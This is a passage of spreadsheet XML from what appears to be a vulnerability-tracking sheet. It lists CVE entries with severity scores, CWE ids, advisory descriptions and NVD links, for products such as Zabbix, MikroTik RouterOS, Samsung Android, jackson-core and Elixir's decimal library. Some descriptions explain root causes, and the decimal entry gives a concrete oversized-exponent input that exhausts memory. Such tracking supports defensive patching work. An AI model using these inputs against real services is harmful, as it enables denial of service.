          <t>Zabbix API and Frontend login lockout mechanism has a flaw where several unsuccessful login requests are not properly counted towards the block counter if sent simultaneously, potentially allowing for more password guesses than intended.</t>
        </is>
      </c>
      <c r="M3534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-1199</t>
        </is>
      </c>
    </row>
    <row r="3535">
      <c r="A3535" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13326</t>
        </is>
      </c>
      <c r="C3535" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3535" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3535" s="5" t="inlineStr"/>
      <c r="F3535" s="5" t="inlineStr"/>
      <c r="G3535" s="5" t="inlineStr"/>
      <c r="H3535" s="5" t="inlineStr"/>
      <c r="I3535" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3535" s="5" t="inlineStr"/>
      <c r="K3535" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-191</t>
        </is>
      </c>
      <c r="L3535" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in Qt NFC's language code length parsing allows a physically proximate attacker to cause a denial of service or limited memory disclosure via a crafted NFC tag.</t>
        </is>
      </c>
      <c r="M3535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13326</t>
        </is>
      </c>
    </row>
    <row r="3536">
      <c r="A3536" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14227</t>
        </is>
      </c>
      <c r="C3536" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3536" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3536" s="5" t="inlineStr"/>
      <c r="F3536" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3536" s="5" t="inlineStr"/>
      <c r="H3536" s="5" t="inlineStr"/>
      <c r="I3536" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J3536" s="5" t="inlineStr"/>
      <c r="K3536" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L3536" s="5" t="inlineStr">
        <is>
          <t>An API session‑management flaw in products with the MikroTik RouterOS API enabled are vulnerable to a Insufficient Session Expiration vulnerability. This could allow active sessions to retain their previous permission set after inactivity timeouts or user‑group changes. As a result, an authenticated user whose permissions have been reduced may continue accessing information.</t>
        </is>
      </c>
      <c r="M3536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14227</t>
        </is>
      </c>
    </row>
    <row r="3537">
      <c r="A3537" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15417</t>
        </is>
      </c>
      <c r="C3537" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3537" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3537" s="5" t="inlineStr"/>
      <c r="F3537" s="5" t="inlineStr"/>
      <c r="G3537" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3537" s="5" t="inlineStr"/>
      <c r="I3537" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3537" s="5" t="inlineStr"/>
      <c r="K3537" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="L3537" s="5" t="inlineStr">
        <is>
          <t>In the silabser.sys Windows 8 driver for CP210x devices, a local unprivileged user can use incorrect driver settings to cause a kernel crash.</t>
        </is>
      </c>
      <c r="M3537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15417</t>
        </is>
      </c>
    </row>
    <row r="3538">
      <c r="A3538" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15580</t>
        </is>
      </c>
      <c r="C3538" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3538" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3538" s="5" t="inlineStr"/>
      <c r="F3538" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3538" s="5" t="inlineStr"/>
      <c r="H3538" s="5" t="inlineStr"/>
      <c r="I3538" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J3538" s="5" t="inlineStr"/>
      <c r="K3538" s="5" t="inlineStr">
        <is>
          <t>CWE-1385</t>
        </is>
      </c>
      <c r="L3538" s="5" t="inlineStr">
        <is>
          <t>vault token disclosure via unvalidated postMessage vulnerability in N-able PassPortal allows Authentication Abuse.
This issue affects the PassPortal browser extension: before 3.49.6.</t>
        </is>
      </c>
      <c r="M3538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15580</t>
        </is>
      </c>
    </row>
    <row r="3539">
      <c r="A3539" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15933</t>
        </is>
      </c>
      <c r="C3539" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3539" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3539" s="5" t="inlineStr"/>
      <c r="F3539" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3539" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H3539" s="5" t="inlineStr"/>
      <c r="I3539" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3539" s="5" t="inlineStr"/>
      <c r="K3539" s="5" t="inlineStr">
        <is>
          <t>CWE-256</t>
        </is>
      </c>
      <c r="L3539" s="5" t="inlineStr">
        <is>
          <t>OptimiDoc Server (On-Premise) stores credentials for external services in cleartext. An authenticated administrator can view previously configured service passwords, including SMTP, FTP (for scan delivery), Active Directory (for user list import), and SharePoint credentials, in cleartext via the web administration panel page source, allowing exposure of sensitive third-party authentication data.
This issue was fixed in version 26.08</t>
        </is>
      </c>
      <c r="M3539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15933</t>
        </is>
      </c>
    </row>
    <row r="3540">
      <c r="A3540" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16455</t>
        </is>
      </c>
      <c r="C3540" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3540" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3540" s="5" t="inlineStr"/>
      <c r="F3540" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3540" s="5" t="inlineStr"/>
      <c r="H3540" s="5" t="inlineStr"/>
      <c r="I3540" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3540" s="5" t="inlineStr"/>
      <c r="K3540" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L3540" s="5" t="inlineStr">
        <is>
          <t>In Teltonika Networks RUTOS devices running versions 7.07.1 through 7.24.1 and TSWOS devices running versions 1.03 through 1.10, a vulnerability exists whereby a lower privileged user can escalate privileges to administrative level due to unsafe calls to an execl function.</t>
        </is>
      </c>
      <c r="M3540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16455</t>
        </is>
      </c>
    </row>
    <row r="3541">
      <c r="A3541" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17038</t>
        </is>
      </c>
      <c r="C3541" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3541" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3541" s="5" t="inlineStr"/>
      <c r="F3541" s="5" t="inlineStr"/>
      <c r="G3541" s="5" t="inlineStr"/>
      <c r="H3541" s="5" t="inlineStr"/>
      <c r="I3541" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3541" s="5" t="inlineStr"/>
      <c r="K3541" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L3541" s="5" t="inlineStr">
        <is>
          <t>DrEryk Gabinet before 11.5.0 uses hard-coded API credentials in its ticket reporting component. These credentials can be used to authenticate directly to the ticket system API. This allows an attacker to perform privileged operations beyond what is offered by the application, including reading and modifying tickets.</t>
        </is>
      </c>
      <c r="M3541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17038</t>
        </is>
      </c>
    </row>
    <row r="3542">
      <c r="A3542" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18401</t>
        </is>
      </c>
      <c r="C3542" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3542" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3542" s="5" t="inlineStr"/>
      <c r="F3542" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3542" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H3542" s="5" t="inlineStr"/>
      <c r="I3542" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3542" s="5" t="inlineStr"/>
      <c r="K3542" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3542" s="5" t="inlineStr">
        <is>
          <t>The non-blocking (asynchronous) JSON parser in jackson-core does not enforce the maxNumberLength constraint defined in StreamReadConstraints (default: 1000 characters). An attacker able to submit JSON to an application that uses the async parser API can supply a number token of arbitrary length, leading to excessive memory allocation and potential CPU exhaustion, resulting in a denial of service.
The synchronous parser enforces this limit correctly, so the constraint is applied inconsistently depending on which parsing API the application uses.
Root cause: the async parsing path in NonBlockingUtf8JsonParserBase and related classes never invokes the number length validation methods. Number parsing methods such as _finishNumberIntegralPart() accumulate digits into the TextBuffer without any length check, then call _valueComplete() to finalize the token. _valueComplete() does not call resetInt() or resetFloat(), which are the methods in ParserBase where validateIntegerLength() and validateFPLength() are performed. Because that validation step is skipped, maxNumberLength is never enforced on the async code path.
Impact: an attacker sending a JSON document containing an arbitrarily long number to an application using the async parser (for example a Spring WebFlux or other reactive application) can cause unbounded allocation in the TextBuffer and an OutOfMemoryError. If the application subsequently calls getBigIntegerValue() or getDecimalValue(), the JVM may additionally be tied up in O(n^2) BigInteger parsing, causing CPU-based denial of service.
No privileges or user interaction beyond the ability to submit data for parsing are required.
This issue affects com.fasterxml.jackson.core:jackson-core from version 2.15.0 through 2.18.5 and from 2.19.0 through 2.21.0, and tools.jackson.core:jackson-core from 3.0.0 through 3.0.x.
Versions prior to 2.15.0 are not affected, because StreamReadConstraints -- which defines the maxNumberLength setting -- was first introduced in jackson-core 2.15.0, so no such constraint exists to be bypassed in earlier releases. Note that GHSA-72hv-8253-57qq records the lower bound of the affected 2.x range as 2.0.0.</t>
        </is>
      </c>
      <c r="M3542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18401</t>
        </is>
      </c>
    </row>
    <row r="3543">
      <c r="A3543" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18444</t>
        </is>
      </c>
      <c r="C3543" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3543" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3543" s="5" t="inlineStr"/>
      <c r="F3543" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3543" s="5" t="inlineStr"/>
      <c r="H3543" s="5" t="inlineStr">
        <is>
          <t>ni:labview</t>
        </is>
      </c>
      <c r="I3543" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3543" s="5" t="inlineStr"/>
      <c r="K3543" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="L3543" s="5" t="inlineStr">
        <is>
          <t>There is an integer conversion vulnerability resulting in an out-of-bounds read when loading images recently discovered in NI LabVIEW.  This may result in information disclosure or arbitrary code execution.  Successful exploitation requires an attacker to get a user to open a specially crafted VI file.  This vulnerability affects NI LabVIEW 2026 Q3 and prior versions.</t>
        </is>
      </c>
      <c r="M3543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18444</t>
        </is>
      </c>
    </row>
    <row r="3544">
      <c r="A3544" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18445</t>
        </is>
      </c>
      <c r="C3544" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3544" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3544" s="5" t="inlineStr"/>
      <c r="F3544" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3544" s="5" t="inlineStr"/>
      <c r="H3544" s="5" t="inlineStr">
        <is>
          <t>ni:labview</t>
        </is>
      </c>
      <c r="I3544" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3544" s="5" t="inlineStr"/>
      <c r="K3544" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L3544" s="5" t="inlineStr">
        <is>
          <t>There is an integer overflow vulnerability resulting in an out-of-bounds write recently discovered in NI LabVIEW.  This may result in information disclosure or arbitrary code execution.  Successful exploitation requires an attacker to get a user to open a specially crafted VI file.  This vulnerability affects NI LabVIEW 2026 Q3 and prior versions.</t>
        </is>
      </c>
      <c r="M3544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18445</t>
        </is>
      </c>
    </row>
    <row r="3545">
      <c r="A3545" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18916</t>
        </is>
      </c>
      <c r="C3545" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3545" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3545" s="5" t="inlineStr"/>
      <c r="F3545" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3545" s="5" t="inlineStr"/>
      <c r="H3545" s="5" t="inlineStr">
        <is>
          <t>nlnetlabs:nsd</t>
        </is>
      </c>
      <c r="I3545" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3545" s="5" t="inlineStr"/>
      <c r="K3545" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L3545" s="5" t="inlineStr">
        <is>
          <t>Any remote client can crash a NSD serve child, by throttling the TCP receive window after a TCP query. By continuously crashing the serve childs, the remote client can denial all TCP service to this NSD instance.</t>
        </is>
      </c>
      <c r="M3545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18916</t>
        </is>
      </c>
    </row>
    <row r="3546">
      <c r="A3546" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21088</t>
        </is>
      </c>
      <c r="C3546" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3546" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3546" s="5" t="inlineStr"/>
      <c r="F3546" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3546" s="5" t="inlineStr"/>
      <c r="H3546" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I3546" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3546" s="5" t="inlineStr"/>
      <c r="K3546" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3546" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in loading a subtitle frame in libsubextractor.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="M3546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21088</t>
        </is>
      </c>
    </row>
    <row r="3547">
      <c r="A3547" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21089</t>
        </is>
      </c>
      <c r="C3547" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3547" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3547" s="5" t="inlineStr"/>
      <c r="F3547" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3547" s="5" t="inlineStr"/>
      <c r="H3547" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I3547" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3547" s="5" t="inlineStr"/>
      <c r="K3547" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3547" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in removing style tag in libsubextractor.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="M3547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21089</t>
        </is>
      </c>
    </row>
    <row r="3548">
      <c r="A3548" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21098</t>
        </is>
      </c>
      <c r="C3548" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3548" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3548" s="5" t="inlineStr"/>
      <c r="F3548" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3548" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3548" s="5" t="inlineStr"/>
      <c r="I3548" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3548" s="5" t="inlineStr"/>
      <c r="K3548" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L3548" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Link to Windows prior to SMR Sep-2026 Release 1 allows local attackers to establish a connection with the PC without proper user interaction.</t>
        </is>
      </c>
      <c r="M3548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21098</t>
        </is>
      </c>
    </row>
    <row r="3549">
      <c r="A3549" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21100</t>
        </is>
      </c>
      <c r="C3549" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3549" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3549" s="5" t="inlineStr"/>
      <c r="F3549" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3549" s="5" t="inlineStr"/>
      <c r="H3549" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I3549" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3549" s="5" t="inlineStr"/>
      <c r="K3549" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L3549" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SystemUI prior to SMR Sep-2026 Release 1 allows local attackers to launch arbitrary activity.</t>
        </is>
      </c>
      <c r="M3549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21100</t>
        </is>
      </c>
    </row>
    <row r="3550">
      <c r="A3550" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21107</t>
        </is>
      </c>
      <c r="C3550" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3550" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3550" s="5" t="inlineStr"/>
      <c r="F3550" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3550" s="5" t="inlineStr"/>
      <c r="H3550" s="5" t="inlineStr"/>
      <c r="I3550" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3550" s="5" t="inlineStr"/>
      <c r="K3550" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3550" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Samsung Notes prior to version 4.4.45.5 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="M3550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21107</t>
        </is>
      </c>
    </row>
    <row r="3551">
      <c r="A3551" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21108</t>
        </is>
      </c>
      <c r="C3551" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3551" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3551" s="5" t="inlineStr"/>
      <c r="F3551" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3551" s="5" t="inlineStr"/>
      <c r="H3551" s="5" t="inlineStr"/>
      <c r="I3551" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3551" s="5" t="inlineStr"/>
      <c r="K3551" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="L3551" s="5" t="inlineStr">
        <is>
          <t>Improper export of android application components in Bixby Touch prior to version 4.3.01.17 allows local attackers to access sensitive information.</t>
        </is>
      </c>
      <c r="M3551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21108</t>
        </is>
      </c>
    </row>
    <row r="3552">
      <c r="A3552" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21110</t>
        </is>
      </c>
      <c r="C3552" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3552" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3552" s="5" t="inlineStr"/>
      <c r="F3552" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3552" s="5" t="inlineStr"/>
      <c r="H3552" s="5" t="inlineStr"/>
      <c r="I3552" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3552" s="5" t="inlineStr"/>
      <c r="K3552" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3552" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libsavscmn.so prior to One UI 8.5 allows local attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M3552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21110</t>
        </is>
      </c>
    </row>
    <row r="3553">
      <c r="A3553" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21111</t>
        </is>
      </c>
      <c r="C3553" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3553" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3553" s="5" t="inlineStr"/>
      <c r="F3553" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3553" s="5" t="inlineStr"/>
      <c r="H3553" s="5" t="inlineStr"/>
      <c r="I3553" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3553" s="5" t="inlineStr"/>
      <c r="K3553" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3553" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libsthmbc.so prior to One UI 8.5 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="M3553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21111</t>
        </is>
      </c>
    </row>
    <row r="3554">
      <c r="A3554" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23923</t>
        </is>
      </c>
      <c r="C3554" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3554" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3554" s="5" t="inlineStr"/>
      <c r="F3554" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3554" s="5" t="inlineStr"/>
      <c r="H3554" s="5" t="inlineStr">
        <is>
          <t>zabbix:zabbix</t>
        </is>
      </c>
      <c r="I3554" s="5" t="inlineStr">
        <is>
          <t>2026-03-24</t>
        </is>
      </c>
      <c r="J3554" s="5" t="inlineStr"/>
      <c r="K3554" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="L3554" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated attacker can exploit the Frontend 'validate' action to blindly instantiate arbitrary PHP classes. The impact depends on environment setup but appears limited at this time.</t>
        </is>
      </c>
      <c r="M3554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23923</t>
        </is>
      </c>
    </row>
    <row r="3555">
      <c r="A3555" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32686</t>
        </is>
      </c>
      <c r="C3555" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3555" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3555" s="5" t="inlineStr"/>
      <c r="F3555" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3555" s="5" t="inlineStr"/>
      <c r="H3555" s="5" t="inlineStr"/>
      <c r="I3555" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J3555" s="5" t="inlineStr"/>
      <c r="K3555" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3555" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled Resource Consumption vulnerability in ericmj decimal allows unauthenticated remote Denial of Service.
The decimal library does not bound the exponent on parsed input. Storing a decimal with a very large exponent (e.g. Decimal.new("1e1000000000")) is accepted without error. Subsequent calls to arithmetic functions (Decimal.add/2, Decimal.sub/2, Decimal.div/2M), Decimal.to_string/2M with :normalM or :xsdM format, Decimal.to_integer/1M, Decimal.round/3M, or Decimal.compare/3M with a threshold allocate memory proportional to the exponent value, which can exhaust available memory and crash the BEAM VM.
Any application that accepts user-supplied decimal input and subsequently performs arithmetic, rounding, conversion to integer, or string formatting on it is exposed. A single malicious request is sufficient to cause an out-of-memory crash.
This issue affects decimal: from 0.1.0 before 3.0.0.</t>
        </is>
      </c>
      <c r="M3555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32686</t>
        </is>
      </c>
    </row>
    <row r="3556">
      <c r="A3556" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34964</t>
        </is>
      </c>
      <c r="C3556" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3556" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3556" s="5" t="inlineStr"/>
      <c r="F3556" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3556" s="5" t="inlineStr"/>
      <c r="H3556" s="5" t="inlineStr"/>
      <c r="I3556" s="5" t="inlineStr">
